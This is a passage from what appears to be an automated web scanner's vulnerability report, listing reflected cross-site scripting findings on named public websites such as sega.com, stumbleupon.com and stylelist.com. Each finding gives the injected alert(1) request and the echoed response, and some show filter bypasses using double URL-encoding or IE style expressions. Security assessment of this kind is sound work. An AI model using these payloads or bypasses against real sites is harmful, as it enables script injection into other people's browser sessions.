The value of the url request parameter is copied into the HTML document as text between TITLE tags. The payload e5aa6</title><script>alert(1)</script>8a11b8b567b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add?url=http%3A%2F%2Ffeeds.feedburner.com%2FDeloitteUse5aa6</title><script>alert(1)</script>8a11b8b567b HTTP/1.1
Host: www.plusmo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:42:56 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: text/html; charset=UTF8
Content-Length: 10557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<title>RSS Feed http://feeds.feedburner.com/DeloitteUse5aa6</title><script>alert(1)</script>8a11b8b567b Mobile Widget Preview</title>
...[SNIP]...

1.396. http://www.pollmonkey.com/s.asp [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pollmonkey.com
Path:   /s.asp

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43dd6"%3balert(1)//b9efb08da3e was submitted in the c parameter. This input was echoed as 43dd6";alert(1)//b9efb08da3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /s.asp?c=5389959443dd6"%3balert(1)//b9efb08da3e&u=6122467569 HTTP/1.1
Host: www.pollmonkey.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:43:28 GMT
X-Powered-By: ASP.NET
pragma: No-cache
cache-control: private
Content-Length: 366
Content-Type: application/x-javascript
Expires: Mon, 30 Nov 2009 21:43:28 GMT
Set-Cookie: ASPSESSIONIDQQTDSCCB=LCECPIMAEBBMMKBPLNCFFPHJ; path=/
Cache-control: no-cache
Connection: close
X-Powered-By: Bananas and Rum
X-Monkey-Sign: Screaming Monkeys


document.write("<script src=\"http://www.pollmonkey.com/Users/5389959443dd6";alert(1)//b9efb08da3e/Polls/6122467569/result.js?Rnd=0.9781153\"></script>");
document.write("<script src=\"http://www.p
...[SNIP]...

1.397. http://www.primidi.com/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.primidi.com
Path:   /rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbcbc"><a>edcc746ee30 was submitted in the REST URL parameter 1. This input was echoed as cbcbc\"><a>edcc746ee30 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss.xmlcbcbc"><a>edcc746ee30 HTTP/1.1
Host: www.primidi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:43:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 10173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <title>Rss.xmlcbcbc
...[SNIP]...
<meta name="Keywords" content="rss.xmlcbcbc\"><a>edcc746ee30, www.primidi.com, rss.xmlcbcbc">
...[SNIP]...

1.398. http://www.primidi.com/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.primidi.com
Path:   /rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cf2b<a>42170eff543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss.xml1cf2b<a>42170eff543 HTTP/1.1
Host: www.primidi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:43:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 10548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <title>Rss.xml1cf2b
...[SNIP]...
<H1>Rss.xml1cf2b<a>42170eff543 Topics</H1>
...[SNIP]...

1.399. http://www.rockpapershotgun.com/2010/11/17/solving-biowares-code-shattered-steel/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockpapershotgun.com
Path:   /2010/11/17/solving-biowares-code-shattered-steel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66267"><script>alert(1)</script>39ce2832c2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66267\"><script>alert(1)</script>39ce2832c2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/17/solving-biowares-code-shattered-steel/?66267"><script>alert(1)</script>39ce2832c2b=1 HTTP/1.1
Host: www.rockpapershotgun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:39:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Cookie
X-Pingback: http://www.rockpapershotgun.com/xmlrpc.php
Link: <http://www.rockpapershotgun.com/?p=44231>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 160780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://www.rockpapershotgun.com/2010/11/17/solving-biowares-code-shattered-steel/?66267\"><script>alert(1)</script>39ce2832c2b=1" />
...[SNIP]...

1.400. http://www.sega.com/games/sonic-colors/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sega.com
Path:   /games/sonic-colors/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056b"><script>alert(1)</script>63b683099ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056b\"><script>alert(1)</script>63b683099ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games/sonic-colors/?2056b"><script>alert(1)</script>63b683099ea=1 HTTP/1.1
Host: www.sega.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:38:06 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny3
Set-Cookie: PHPSESSID=A~47c855202c4e378351e8c5ff28a30a66; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sega_preferred_territory=EnglishUSA; expires=Tue, 21-Dec-2010 21:38:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 36088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...
<a href="?t=EnglishUK&amp;gseoid=sonic-colors&amp;2056b\"><script>alert(1)</script>63b683099ea=1" title="EnglishUK" class="EnglishUK">
...[SNIP]...

1.401. http://www.shacknews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shacknews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d710b"><script>alert(1)</script>a4009f59791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d710b"><script>alert(1)</script>a4009f59791=1 HTTP/1.1
Host: www.shacknews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:38:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Sun, 20 Dec 1998 01:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 21:38:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Set-Cookie: SHACKID=balancer.10.1.1.22; path=/; domain=.www.shacknews.com
Set-Cookie: shackon=anon%40174.121.222.18%251290375522; expires=Sun, 21-Nov-2010 22:08:42 GMT; path=/
Set-Cookie: shackon=anon%40174.121.222.18%251290375522; expires=Sun, 21-Nov-2010 22:08:42 GMT; path=/
Connection: close
Content-Length: 144783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...
<input type="hidden" name="uri" value="/?d710b"><script>alert(1)</script>a4009f59791=1" />
...[SNIP]...

1.402. http://www.slashgear.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slashgear.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743dc"><script>alert(1)</script>69628aaf259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 743dc\"><script>alert(1)</script>69628aaf259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?743dc"><script>alert(1)</script>69628aaf259=1 HTTP/1.1
Host: www.slashgear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:37:21 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.3
X-Pingback: http://www.slashgear.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 60815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<a href="http://www.slashgear.com/page/2/?743dc\"><script>alert(1)</script>69628aaf259=1" title="Page 2">
...[SNIP]...

1.403. http://www.smartertravel.com/vacation-package/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /vacation-package/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9915d<script>alert(1)</script>865802b6e3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vacation-package9915d<script>alert(1)</script>865802b6e3a/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 21:37:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=c7d73d2e84793264b7c95b98f5b127aefab048480773a6dd1d469ce0e24a4e3f8fd96aa7b3f066d2df3e78b115862f7ab886d33f6a63be7b57def4f0a56f49fb; expires=Mon, 21-Nov-2011 21:37:58 GMT; path=/
Set-Cookie: vid=4ce99136434590.18992094; path=/; domain=.smartertravel.com
Set-Cookie: uu=6a2d177e-38ac-4d2f-908c-527b3da4e631; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 21-Nov-2009 21:37:57 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 21-Nov-2009 21:37:57 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 21-Nov-2009 21:37:57 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/vacation-package9915d<script>alert(1)</script>865802b6e3a/</p>
...[SNIP]...

1.404. http://www.streettech.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.streettech.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7491"><script>alert(1)</script>d8bc78cd73a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f7491"><script>alert(1)</script>d8bc78cd73a=1 HTTP/1.1
Host: www.streettech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:37:22 GMT
Server: Apache
Cache-Control: cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.9
Set-Cookie: POSTNUKESID=8d450e776a2abf344184057d2c046269; expires=Thu, 22 Nov 2035 03:37:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 84688

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Street Tech :: hardware beyond the hype</t
...[SNIP]...
<input type="hidden" name="url" value="/?f7491"><script>alert(1)</script>d8bc78cd73a=1" />
...[SNIP]...

1.405. http://www.streettech.com/backend.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.streettech.com
Path:   /backend.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc443"><script>alert(1)</script>04c0df10c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fc443"><script>alert(1)</script>04c0df10c73 HTTP/1.1
Host: www.streettech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 21:37:18 GMT
Server: Apache
Content-Length: 2328
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
<frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.streettech.com/fc443"><script>alert(1)</script>04c0df10c73">
...[SNIP]...

1.406. http://www.stumbleupon.com/submit [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f21"style%3d"x%3aexpression(alert(1))"a1c6f3f5039 was submitted in the url parameter. This input was echoed as 56f21"style="x:expression(alert(1))"a1c6f3f5039 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=http://www.wired.com/underwire/2010/11/deathly-hallows-fans/56f21"style%3d"x%3aexpression(alert(1))"a1c6f3f5039&title=5+Things+%3Ccite%3EHarry+Potter%3C%2Fcite%3E+Fans+Will+Fight+Over+in+%3Ccite%3EDeathly+Hallows%3C%2Fcite%3E+Film HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=3b8lfu01d8so5v9hic7vg687f3; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=14048012054ce99116101d28.89949743; expires=Tue, 21-Dec-2010 21:37:26 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Tue, 21-Dec-2010 21:37:26 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Tue, 21-Dec-2010 21:37:26 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=e247abf51a0dc490752756567a7521c6%7C%7C10%7C%7C1290375446%7C5f5a92b41dd7fad510c5963b3e076f80; expires=Wed, 18-Nov-2020 21:37:26 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49810
Date: Sun, 21 Nov 2010 21:37:26 GMT
X-Varnish: 1516004189
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://www.wired.com/underwire/2010/11/deathly-hallows-fans/56f21"style="x:expression(alert(1))"a1c6f3f5039" />
...[SNIP]...

1.407. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /tag/SkinnyJeans/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7b890%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7259bff540 was submitted in the REST URL parameter 2. This input was echoed as 7b890</title><script>alert(1)</script>d7259bff540 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tag/SkinnyJeans7b890%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7259bff540/ HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:38:32 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=a6445e34934b7892c6ded31d3c96e966; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GEO-174_121_222_18=usa%3A%3Ahouston%3A%3A029.763%3A%3A-095.363%3A%3Abroadband%3A%3Atx; expires=Mon, 22-Nov-2010 21:38:32 GMT; path=/
Keep-Alive: timeout=5, max=999985
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<title>SkinnyJeans7b890</title><script>alert(1)</script>d7259bff540 - Articles and Posts from StyleList</title>
...[SNIP]...

1.408. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /tag/SkinnyJeans/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 265aa%253cscript%253ealert%25281%2529%253c%252fscript%253eb55c61c1ed5 was submitted in the REST URL parameter 2. This input was echoed as 265aa<script>alert(1)</script>b55c61c1ed5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tag/SkinnyJeans265aa%253cscript%253ealert%25281%2529%253c%252fscript%253eb55c61c1ed5/ HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:38:26 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=06cce885c4d9150de107c153f1573e6d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GEO-174_121_222_18=usa%3A%3Ahouston%3A%3A029.763%3A%3A-095.363%3A%3Abroadband%3A%3Atx; expires=Mon, 22-Nov-2010 21:38:26 GMT; path=/
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<span id="catname" style="text-transform:capitalize;" >SkinnyJeans265aa<script>alert(1)</script>b55c61c1ed5</span>
...[SNIP]...

1.409. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /tag/SkinnyJeans/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c79"-alert(1)-"1949e52f475 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag/SkinnyJeans76c79"-alert(1)-"1949e52f475/ HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:38:01 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=e396dc62d0d8322fe3edc828f2933174; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GEO-174_121_222_18=usa%3A%3Ahouston%3A%3A029.763%3A%3A-095.363%3A%3Abroadband%3A%3Atx; expires=Mon, 22-Nov-2010 21:38:01 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
+ " | Main Page";}

s_265.channel="us.style";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,stylelist.com";
s_265.prop12="http://www.stylelist.com/tag/SkinnyJeans76c79"-alert(1)-"1949e52f475/";
s_265.mmxgo=true;
/* if ($bloggerslug!="") {
s_265.mmxtitle="Posts at StyleList";
}*/
s_265.t();
}
var s_account = "aolstylist,aolsvc";
(function(){
var d =
...[SNIP]...

1.410. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /tag/SkinnyJeans/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10563%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6320e29c59a was submitted in the REST URL parameter 2. This input was echoed as 10563\"><script>alert(1)</script>6320e29c59a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tag/SkinnyJeans10563%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6320e29c59a/ HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:37:58 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=e421ec2f05bf4131be359d9747d937e6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: GEO-174_121_222_18=usa%3A%3Ahouston%3A%3A029.763%3A%3A-095.363%3A%3Abroadband%3A%3Atx; expires=Mon, 22-Nov-2010 21:37:58 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta name="description" content="Posts about SkinnyJeans10563\"><script>alert(1)</script>6320e29c59a on StyleList" />
...[SNIP]...

1.411. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /tag/SkinnyJeans/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87744"-alert(1)-"a1efa8aff4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag/SkinnyJeans/?87744"-alert(1)-"a1efa8aff4b=1 HTTP/1.1
Host: www.stylelist.com
Accept: */*
Accept-Language: en
